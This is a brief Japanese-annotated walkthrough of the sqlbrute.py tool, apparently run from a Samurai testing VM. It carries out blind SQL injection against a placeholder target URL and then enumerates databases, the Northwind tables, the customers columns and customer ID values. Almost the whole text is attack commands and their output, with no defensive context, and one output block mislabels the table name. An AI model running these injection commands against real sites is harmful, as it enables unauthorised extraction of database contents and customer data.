http://www.justinclarke.com/archives/2006/03/sqlbrute.html
まずはポストデータを投入
samurai@samurai:~$ sqlbrute.py --data "ポストデータ'" 対象URL
Database type: sqlserver
Table:
Columns:
Enumeration mode: database
Threads: 5
Testing the application to ensure your options work
OR doesn't appear to work - trying AND
User input exploit and parameters do not appear to work for error testing - trying time testing
Exploit and parameters appear to work for time testing
This program will currently exit 60 seconds after the last response comes in.
Found: pubs
Found: msdb
Found: tempdb
Found: model
Found: userdb
Found: master
Found: northwind
データベース名を付加
samurai@samurai:~$ sqlbrute.py --data "ポストデータ'" --database northwind 対象URL
Found: orders
Found: region
Found: shippers
Found: products
Found: employees
Found: suppliers
Found: customers
Found: categories
Found: territories
Found: order+details
Found: employeeterritories
Found: customerdemographics
Found: customercustomerdemo
テーブル名を付加
samurai@samurai:~$ sqlbrute.py --data "ポストデータ'" --database northwind --table customers 対象URL
Database type: sqlserver
Table: orders
Columns:
Enumeration mode: column
Threads: 5
Testing the application to ensure your options work
Found: fax
Found: city
Found: phone
Found: region
Found: country
Found: address
Found: customerid
Found: postalcode
Found: contactname
Found: companyname
Found: contacttitle
カラムを付加
samurai@samurai:~$ sqlbrute.py --data "ポストデータ'" --database northwind --table customers --column customerid 対象URL
Database type: sqlserver
Table: customers
Columns: customerid
Enumeration mode: data
Threads: 5
Testing the application to ensure your options work
Found: eastc
Found: ernsh
Found: tomsp
Found: tortu
Found: traih
Found: thecr
Found: tradh
Found: thebi
Found: alfki
Found: anatr
Found: rattc
Found: anton
Found: arout
Found: ranch
Found: reggc
Found: islat
Found: ricar
Found: ricsu